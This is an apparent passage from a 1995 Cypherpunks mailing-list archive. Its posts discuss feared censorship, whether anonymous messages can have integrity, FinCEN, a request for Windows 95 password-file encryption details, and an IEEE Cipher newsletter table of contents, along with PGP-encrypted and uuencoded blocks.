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
AQEElCFPKxkr96kBEbRmdjeXBA==
=7IoD
-----END PGP MESSAGE-----







From gjeffers at socketis.net  Thu Nov  2 01:31:15 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Thu, 2 Nov 1995 17:31:15 +0800
Subject: Was I censored by a sophisticated word parser/key word searcher?
Message-ID: <199511021323.HAA09729@mail.socketis.net>


My original plaintext post of Internet control by spooks has still not been 
posted. I have made 2 posts since that were posted quickly. Are things 
getting BAD!? Could I have fucked up? Do remailers now have a new use? 
Should remailers with encryption be used to spread the alarm to the rest of 
the Internet? My fellow Cypherpunks with bigger Internet mechanics brains 
should check this out. Can the original BLACKOUT post be reposted to other 
mailing lists or will it be censored? Check it out! - Beat State! - Gary Jeffers






From tbyfield at panix.com  Thu Nov  2 02:12:51 1995
From: tbyfield at panix.com (t byfield)
Date: Thu, 2 Nov 1995 18:12:51 +0800
Subject: Was I censored <etc.>
Message-ID: <v02120d01acbe45596b38@DialupEudora>


At 3:15 AM 11/2/95, Gary Jeffers wrote:
>My original plaintext post of Internet control by spooks has still not been
>posted. I have made 2 posts since that were posted quickly. Are things
>getting BAD!? Could I have fucked up? Do remailers now have a new use?
 <etc.>

And at 4:45 am or so, having worked all bloody night--having received all
the posts you mention--I'm responding:

        (1) Chill out, chum.
        (2) CP maybe isn't the best place to post internal dialogues.
        (3) There's a good chance that many people on this list have had
            one or another experience with automagically/mysteriously
            delayed mail: AFAICT, we're all still here. If you'd like,
            I'll confirm that I heard my echo from the listserv.
and    (4)  If you live around the NY/NY area, give WFMU some money; and
            even if you don't, give them some money. If the spooks are
            ever stupid enough to "black out" the net, some fruit with
            very fine musical taste at FMU will let everyone know. But
            only with your support.

            Ted







From llurch at networking.stanford.edu  Thu Nov  2 02:33:19 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Thu, 2 Nov 1995 18:33:19 +0800
Subject: From Bill Frezza: Electronic Warfare
In-Reply-To: <199511010500.GAA03716@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.951031212735.8947A-100000@Networking.Stanford.EDU>


On Wed, 1 Nov 1995, Anonymous wrote:

> On Tue, 31 Oct 1995, Bill Frezza <frezza at interramp.com> wrote:
> 
> > Attached is a column that will appear on the op-ed page of tomorrow's
> > (10/30) Communications Week that was stimulated largely by a report filed
> 
> > Cypherpunks mailing list (majordomo at toad.com) you can get some excellent
> 
> list address is cypherpunks at toad.com
> list manager is majordomo at toad.com
> sending list mail to majordomo will not work

Sending mail without valid commands to majordomo will give you a help
file.  You don't *really* want the actual list address to be published
everywhere, do you? I think the noise/signal ratio is high enough already.

cypherpunks-request at toad.com would have been better, because it gives a 
more specific help file. URL would have been better still. But not the 
address.

-rich





From carolann at censored.org  Thu Nov  2 02:43:31 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Thu, 2 Nov 1995 18:43:31 +0800
Subject: Happy Halloween!
Message-ID: <199510312107.VAA11674@mailhost1.primenet.com>


May you find happiness on the 
Yellow Brick Road of Cryptography.
(costuming of the highest art)

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From jya at pipeline.com  Thu Nov  2 02:47:33 1995
From: jya at pipeline.com (John Young)
Date: Thu, 2 Nov 1995 18:47:33 +0800
Subject: PRL_har
Message-ID: <199510312321.SAA05260@pipe4.nyc.pipeline.com>


   Ito has shared an LA Times report of October 21 on frantic
   Japanese economic espionage, there and in the US, and its
   booming bugging and wiretapping industry.

   And The Wash Post simpers today about the CIA-Mils self-
   sucking into the eco-spy quagmire to garner funds, as spit
   in its toon yesterday.

   More non-crypto: FinTimes jabbers today in "Cars safe from
   phone threat," on the weird effects on automobile
   "electronic-based safety-critical systems" of pervasive
   sources of electro-magnetic interference, say by your
   mobile phone or police transceivers, that may catapult
   the family-fun Land Rover into Rancid's roadbus.


   PRL_har  (3 all 15 kb)













From fc at all.net  Thu Nov  2 03:41:54 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Thu, 2 Nov 1995 19:41:54 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <199511020504.AAA19291@thor.cs.umass.edu>
Message-ID: <9511021110.AA01070@all.net>


> Dr. Frederick B. Cohen writes:
> > I have been convinced for some time that you can't have both integrity and
> > anonymity.  
> [and in a followup]
> > I might be misinterpreted as having meant that it is impossible to have
> > both integrity and anonymity. That is not what I meant, [...]
> 
> Er, thanks for the clarification....

A typical quotation taken out of context.  You missed the part after "I
meant" where I explained that I meant you couldn't assure ...  - That
is, you could have both or not have both, but you couldn't be certain
that you had both.

> > Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
> > 	2) A state of being unimpaired; soundness.
> > 	3) The quality or condition of being whole or undivided; soundness
> > 	Also) soundness, completeness,
> > Alternatively:
> > 	1) Strict personal honesty and independence...
> > 	2) Completeness; unity...
> > 	3) The state of being unimpaired; soundness...''
> > 
> > In this context, I might be misinterpreted as having meant that it is
> > impossible to have both integrity and anonymity.  That is not what I
> > meant, although it is probably also true in a very strict sense.
> 
> All right, what makes you think that ?  Lest we wave our hands too much and
> totally misunderstand each other, let me lay down a more concrete scenario.
> If you have a substantially different scenario in mind, let me know.
> 
> Suppose that I send an anonymous message to a public forum such as this. I
> and the message seem to "have anonymity" by any standard I can presently
> imagine. Now, in what ways might I or the message lack integrity in this
> situation ?  

If the message was not of any particular import to anyone, integrity
would not be a very big issue, but suppose you took quotes out of
context and cleverly tried to construct a picture of the other person
as not being reputable.  People who read the message might believe that
what you said was true, or at least had a grain of truth to it.  That
sort of message lacks integrity, and the reason it lacks integrity is
because it has anonymity, not just because it's false and misleading.

To clarify even further, I seem to recall a posting some months ago from
an anonymous source declaring a new on-line for-sale forum called the
Internet Security Newsletter (or some such thing).  The anonymity of the
poster in the context of asking for money and the fact that one of the
people who was claimed to be on the board of editors was not, in fact, a
participant, led to the question of who the person was.  It turned out
that this person had a substantial history of putting forth falsehoods
as well as other related things that might have been very helpful in
evaluating the credence of his statements.  It turned out that the
newsletter was, at least in some sense and without making value
judgements, legitimate; but the anonymity of the person making the posts
made it harder to assure the integrity of the statements made, which
exacerbated the assurance issue. 

> I haven't broken my personal ethical codes, although perhaps
> I've violated someone else's. I have been honest, at least as much as I am
> generally honest in anything I write. I am not lying by donning the cloak of
> anonymity; I have not misrepresented my identity, merely refused to reveal
> it. The content of the message can be considered sound as much as anything
> else can. The message is incomplete in the sense that it does not include
> the true identity of the author -- is this what you would claim as a
> failure of integrity ?  All messages are incomplete in the sense that
> various important facts are absent from them.

I don't know you, which also means that I don't know your motives.  This
brings up the problem that, even though your postings may be true and
your motives honorable, they may not be, and there is no way to look
into your background and evaluate your history in order to assess your
statements.  In many cases, I believe statements because of their source
and my experience with that source.

I understand that over time, reputations can be built up for pseudonyms
(which are not necessarily anonyms) but then, with a pseudonym we might
reasonably ask what the motive is for hiding the real identity.  Is it
for fun? Because it's there? In solidarity for those who have legitimate
reasons for remaining anonymous? Or is it a means to influence others
for personal or national gain? Is it a way of spreading disinformation?
Is it a way to escape liability for slanderous statements? Is it a way
to keep people from finding out that there is a personal grudge being
played out? Without knowing the motive, how can we assess the
statements? In fact, how can we know that the original pseudonym still
applies? Someone could kill you and take over your pseudonym, and even
though we might hear of your death, the pseudonym might continue based
on your reputation but with another actual source.

It's an interesting concept that each statement should/could be taken on
its own and evaluated independently of the rest of a person's life
context, but in my experience, that has serious problems.

> > To clarify, I don't think you can assure integrity when you have anonymity.
> > 
> > This follows from my earlier writings (circa 1984-89), which are fairly
> > extensive, and in which I made the only marginally supported claim that
> > you can't have (i.e., assure) both integrity and secrecy in a system
> > with sharing.  This came originally from the result that integrity +
> > secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
> > which was extended into a POset which characterizes the extent to which
> > integrity and secrecy can be maintained based on transitive information
> > flow.
> > 
> > The less mathematical reasoning is that in order to be able to verify
> > integrity, you have to be able to examine the information that is
> > secret, while having secrecy requires that you not be able to have
> > independent verification.  Thus the two limit each other. 
> > 
> > Anonymity, in this copntext, can be thought of as secrecy.
> 
> I understand the nature of the information flow argument, but I don't see
> that it's applicable. You appear to contend that the assurance of the
> integrity of an anonymous message depends upon the examination of
> information that is "secret", that is, _not part of the message_. But no
> message is complete -- all messages have many such associated "secrets" not
> available as part of the messages. So the claim seems to be vacuous: we
> can assure the integrity of neither anonymous nor verinymous messages.

An important point.  The more we know, the more certain we can be.  With
computer-based anonymity as it is practiced today, and ignoring the
examples of the pseudonyms that were broken by legal warrant, we have
very little knowledge about the originator of a message, and thus we
have very little assurance of the integrity of their messages.  The
history built up over time for a given pseudonym certainly increases the
assurance associated with it, but there are other problems with this.

Example: I have two (N) pseudonyms that put forth different points of
view specifically directed to create different kinds of credence to
different audiences.  If the audiences knew that both (several) of the
pseudonyms were in fact the same person, they would have very different
beliefs about the individual given the combined picture than they might
get from any one of the pictures.

> Perhaps the rejoinder will be that anonymous messages have a 
> _characteristic_ piece of missing "secret" information, namely the senders'
> True Names. But you have yet to offer any argument that only certain special
> "secrets" must be examined in order to verify integrity.

It's not only the True Name that's at issue.  It's the association of a
set of messages and historical information with a source.  For example,
if we knew you were a KGB agent working in the disinformation and
economic espionage branches, we might evaluate your postings differently
than if we knew you were a high-school student from Deluth whose father
taught her a lot about cryptography when she was young.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From liberty at gate.net  Thu Nov  2 05:25:45 1995
From: liberty at gate.net (Jim Ray)
Date: Thu, 2 Nov 1995 21:25:45 +0800
Subject: [NOISE] (Was: Re: US government department for crime...)
Message-ID: <199511021311.IAA59742@tequesta.gate.net>


-----BEGIN PGP SIGNED MESSAGE-----

John Young wrote, in his unique style:

>Still, anonymous does make an astutely ironic observation, in 
>humorous lifting of the customary FinCEN cloak:
>
>That the hydra-headed agency may be literally aim at financial 
>*crimes* enforcement rather than enforcement of the laws 
>against such deeds.
>
>
>Especially given the participating renegade agencies who seem 
>to absolve themselves of these laws.
>
>
>Perhaps anonymous is right, they are a band of outlaws, daring 
>to overtly flaunt it, expecting no opposition from the gullible 
>cowed.
>

<I take the bait...> Actually, it's *two* bands of outlaws in
concert, and the "gullible cowed" are beginning to clamor for
anything else. This could be an interesting election year, if
the media would ever-in-hell get out of lap-dog mode and into
watch-dog mode. [I know...I'm not holding my breath.]
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMJjAB21lp8bpvW01AQHnrQP/XU5uwUfR0e9ZpJ2y8+d7MExdruGwrnyW
llp4rC6mNJl8IoyAkZG4ox79rK1mKqd4KzG/XP9lLzuqHCp9Cc5rR0ECe0I5RHnx
WFv66KkcsvVlGSflyMiuDi3R/Ul6y4wEOCaxus4OSHM+NhOcVKQddlg0F5AgOPbL
mzi7SF9/p0I=
=DVN9
-----END PGP SIGNATURE-----
Regards, Jim Ray

"Thank God we don't get all the government we pay for."  Will Rogers

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
Featuring cypherpunk privacy stuff and some of my babypictures!
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty at gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________





From norm at mediacity.com  Thu Nov  2 06:14:48 1995
From: norm at mediacity.com (Norman Hardy)
Date: Thu, 2 Nov 1995 22:14:48 +0800
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
Message-ID: <acbe05a801021004ca84@DialupEudora>


Stanford University Book Store (om compus) has a bunch at about $49.







From jya at pipeline.com  Thu Nov  2 06:15:24 1995
From: jya at pipeline.com (John Young)
Date: Thu, 2 Nov 1995 22:15:24 +0800
Subject: US government department for crime enforcement!
Message-ID: <199511012333.SAA15819@pipe3.nyc.pipeline.com>


Still, anonymous does make an astutely ironic observation, in 
humorous lifting of the customary FinCEN cloak:


That the hydra-headed agency may be literally aim at financial 
*crimes* enforcement rather than enforcement of the laws 
against such deeds.


Especially given the participating renegade agencies who seem 
to absolve themselves of these laws.


Perhaps anonymous is right, they are a band of outlaws, daring 
to overtly flaunt it, expecting no opposition from the gullible 
cowed.











From futplex at pseudonym.com  Thu Nov  2 06:15:34 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 2 Nov 1995 22:15:34 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <9511020130.AA17317@all.net>
Message-ID: <199511020504.AAA19291@thor.cs.umass.edu>


Dr. Frederick B. Cohen writes:
> I have been convinced for some time that you can't have both integrity and
> anonymity.  
[and in a followup]
> I might be misinterpreted as having meant that it is impossible to have
> both integrity and anonymity. That is not what I meant, [...]

Er, thanks for the clarification....

> Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
> 	2) A state of being unimpaired; soundness.
> 	3) The quality or condition of being whole or undivided; soundness
> 	Also) soundness, completeness,
> Alternatively:
> 	1) Strict personal honesty and independence...
> 	2) Completeness; unity...
> 	3) The state of being unimpaired; soundness...''
> 
> In this context, I might be misinterpreted as having meant that it is
> impossible to have both integrity and anonymity.  That is not what I
> meant, although it is probably also true in a very strict sense.

All right, what makes you think that ?  Lest we wave our hands too much and
totally misunderstand each other, let me lay down a more concrete scenario.
If you have a substantially different scenario in mind, let me know.

Suppose that I send an anonymous message to a public forum such as this. I
and the message seem to "have anonymity" by any standard I can presently
imagine. Now, in what ways might I or the message lack integrity in this
situation ?  

I haven't broken my personal ethical codes, although perhaps
I've violated someone else's. I have been honest, at least as much as I am
generally honest in anything I write. I am not lying by donning the cloak of
anonymity; I have not misrepresented my identity, merely refused to reveal
it. The content of the message can be considered sound as much as anything
else can. The message is incomplete in the sense that it does not include
the true identity of the author -- is this what you would claim as a
failure of integrity ?  All messages are incomplete in the sense that
various important facts are absent from them.

> To clarify, I don't think you can assure integrity when you have anonymity.
> 
> This follows from my earlier writings (circa 1984-89), which are fairly
> extensive, and in which I made the only marginally supported claim that
> you can't have (i.e., assure) both integrity and secrecy in a system
> with sharing.  This came originally from the result that integrity +
> secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
> which was extended into a POset which characterizes the extent to which
> integrity and secrecy can be maintained based on transitive information
> flow.
> 
> The less mathematical reasoning is that in order to be able to verify
> integrity, you have to be able to examine the information that is
> secret, while having secrecy requires that you not be able to have
> independent verification.  Thus the two limit each other. 
> 
> Anonymity, in this copntext, can be thought of as secrecy.

I understand the nature of the information flow argument, but I don't see
that it's applicable. You appear to contend that the assurance of the
integrity of an anonymous message depends upon the examination of
information that is "secret", that is, _not part of the message_. But no
message is complete -- all messages have many such associated "secrets" not
available as part of the messages. So the claim seems to be vacuous: we
can assure the integrity of neither anonymous nor verinymous messages.

Perhaps the rejoinder will be that anonymous messages have a 
_characteristic_ piece of missing "secret" information, namely the senders'
True Names. But you have yet to offer any argument that only certain special
"secrets" must be examined in order to verify integrity.

-Futplex <futplex at pseudonym.com>





From anonymous at wmono.remailer  Thu Nov  2 06:36:58 1995
From: anonymous at wmono.remailer (Anonymous)
Date: Thu, 2 Nov 1995 22:36:58 +0800
Subject: [FRED] Anonymity and Integrity
Message-ID: <199511021410.IAA06974@ valhalla.phoenix.net>


[note: i'm not the original 'anonymous user' in this thread]

>If the message was not of any particular import to anyone, integrity
>would not be a very big issue, but suppose you took quotes out of
>context and cleverly tried to construct a picture of the other person
>as not being reputable.  People who read the message might believe that
>what you said was true, or at least had a grain of truth to it.  That
>sort of message lacks integrity, and the reason it lacks integrity is
>because it has anonymity, not just because it's false and misleading.

I, for one, pay very little attention to the author of any
given message on this list, and messages stand on their own
merit. I take everything I read (here and elsewhere) with
a grain of salt, and pay close attention to factual references
if they are supplied to I can do my own investigating and
draw my own conclusions, if the topic piques my interest.

An anonymous posting has exactly the same 'integrity quotient'
as any first-time poster; the reader has no historical perspective
on the author, and the message should be  accepted or discarded
on its own merits, not by a blind "he's usually clueful" or
"who the heck is this?" attitude.

[erm.. I'm not attacking anyone here, just spewing some thoughts
 I haven't bothered to express yet..]

(...)

>Example: I have two (N) pseudonyms that put forth different points of
>view specifically directed to create different kinds of credence to
>different audiences.  If the audiences knew that both (several) of the
>pseudonyms were in fact the same person, they would have very different
>beliefs about the individual given the combined picture than they might
>get from any one of the pictures.

[Obligatory _Ender's Game_ reference grudgingly suppressed]

This happens in 'real life' all the time. I hide the details
of my geeky job from my Friday-night friends, and don't bring
up my recreational pharmaceutical use with my business associates.
Either group would have different feelings about me if they
had a 'combined picture' of my lifestyle. 

>It's not only the True Name that's at issue.  It's the association of a

Personally, I find the quest for employment of any True Name scheme
hogwash, simply because of the multifaceted nature of human existence
(see above), where pseudonimity (virtual or social) is a part of 
everyday life.

True Names are logically almost impossible anyway. What base criteria
would a government, company, or other organization use to assign
and make use of a True Name? Driver's license? (fake) .. DNA fingerprint?
(cloning) .. any attempt to pin /me/ down to a single facet of 
existence is doomed to failure, given how adept the bad guys are
at keeping ahead of the good guys.

>set of messages and historical information with a source.  For example,
>if we knew you were a KGB agent working in the disinformation and
>economic espionage branches, we might evaluate your postings differently
>than if we knew you were a high-school student from Deluth whose father
>taught her a lot about cryptography when she was young.

We all have hidden agendas; personally, until I reach godlike status
(btw, anyone have any spare eye of newt laying around?) I'll have
to be content with judging most things I read with a healthy dose 
of cynicism, and squeeze what 'truth' I can out of it. I've been 
surprised too many times by hidden goals and 'double agents' to put
much stock in /anything/ sent down my pipe.

There's also an argument that the most prolific pseudonyms and 'real'
account-holders have Something They Want Us To Believe and should be
trusted no further than they can be thrown .. analogous, in my book,
to politicians .. perhaps the anonymous are the /only/ entities we
can trust...

--

Oinker - anonymous today in case any of you are my clients :P






From frank at funcom.no  Thu Nov  2 07:20:58 1995
From: frank at funcom.no (Frank Andrew Stevenson)
Date: Thu, 2 Nov 1995 23:20:58 +0800
Subject: REQUEST: Win95 password encryption details
In-Reply-To: <199511020642.WAA17156@Networking.Stanford.EDU>
Message-ID: <Pine.SGI.3.91.951102155921.6835A-100000@odin>



Can anyone please give pointers to the details of the
.PWL password encryption. Thanks.

	Frank


On Wed, 1 Nov 1995, Rich Graves wrote:
> ..., and someone else later picks up the .PWL files, which are not
> encrypted in a particularly secure way, ...


#include <std/disclaimer.h>
Key fingerprint =  E3 D2 BC AD BE F8 C8 2F  A5 89 1D 2B 67 30 EA 1B
PGP encrypted mail preferred, finger for key






From cme at TIS.COM  Thu Nov  2 07:28:07 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 2 Nov 1995 23:28:07 +0800
Subject: [cipher-request@itd.nrl.navy.mil: Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition]
Message-ID: <9511011535.AA05757@tis.com>


Please pardon the forward -- but y'all might be interested in this
newsletter...

==============================================================================
Date: Wed, 1 Nov 95 10:02:51 EST
From: <cipher-request at itd.nrl.navy.mil>
Reply-To: <cipher-request at itd.nrl.navy.mil>
To: <cipherdist at itd.nrl.navy.mil>
Subject:  Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition

Dear Cipher Postcard subscriber,
The next issue of Cipher (EI#10, dated November 1, 1995)
is now available for downloading from the anonymous FTP site or from
the Archive on the Cipher Home Page.  This message includes only the 
table of contents and retrieval instructions. I will update the Web
pages as soon as I can.
Regards,
--Carl
====================================================================

       _/_/_/_/  _/_/_/  _/_/_/_/   _/    _/  _/_/_/_/  _/_/_/_/
      _/          _/    _/     _/  _/    _/  _/        _/     _/
     _/          _/    _/_/_/_/   _/_/_/_/  _/_/      _/_/_/_/
    _/          _/    _/         _/    _/  _/        _/   _/
   _/_/_/_/  _/_/_/  _/         _/    _/  _/_/_/_/  _/     _/

====================================================================
Newsletter of the IEEE Computer Society's TC on Security and Privacy
Electronic Issue 10       November 1, 1995     Carl Landwehr, Editor
                                        Hilarie Orman, Assoc. Editor
====================================================================
Contents:                                         [1550 lines total]
Letter from the Editor 
Security and Privacy News Briefs:                       
 o S&P '96 deadline approaches
 o LISTWATCH: WWW-Security --  by Mary Ellen Zurko
 o US Navy ship's computers penetrated during JWID '95
 o US medical records confidentiality act (S.1360) introduced
 o Microsoft security: printer/network flaws/fixes; 
                       application-level object reuse problem
 o Netscape security: bucks for break-ins
 o Separation (micro)kernel from IBM?
 o European Commission to propose cryptography policy
 o FIRST to re-form as nonprofit
 o RSA pushes for firewall security standard
Articles and Conference Reports:
 o NISS notes:
 o IFIP WG11.3 Conference on Database Security; summary by David Spooner
Calls for Papers: Many! 
Reader's guide to recent security and privacy literature 
 o Conference Papers
 o Journal and Newsletter articles 
Calendar
Who's Where: recent address changes
New Reports available via FTP and WWW
Interesting Links 
DSL subscription offer
How to join the TC on Security and Privacy
Publications for sale 
TC officers
Information for Subscribers and Contributors  
____________________________________________________________________
Retrieval instructions:
 There is an archive that includes each copy distributed so far, in ascii,
 in files you can download at URL
 http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/cipher-archive.html
 There is also an anonymous FTP server that contains the same files.
 To access the archive via anonymous FTP:
 1. ftp www.itd.nrl.navy.mil
 2. At prompt for ID, enter "anonymous"
 3. At prompt for password, enter your actual, full e-mail address
 4. Once you are logged in, change to the Cipher Directory:
    cd pub/cipher
 5. Now you can request any of the files containing Cipher issues in ascii.
    Issues are named in the form: EI#N.9506  where N is the number of the
    issue desired and 9506 captures the year and month it first appeared.
=======end of Electronic Cipher Issue #10, 1 November 1995================






From lvhove&vnet3.vub.ac.be at vnet3.vub.ac.be  Thu Nov  2 08:32:25 1995
From: lvhove&vnet3.vub.ac.be at vnet3.vub.ac.be (Leo Van Hove)
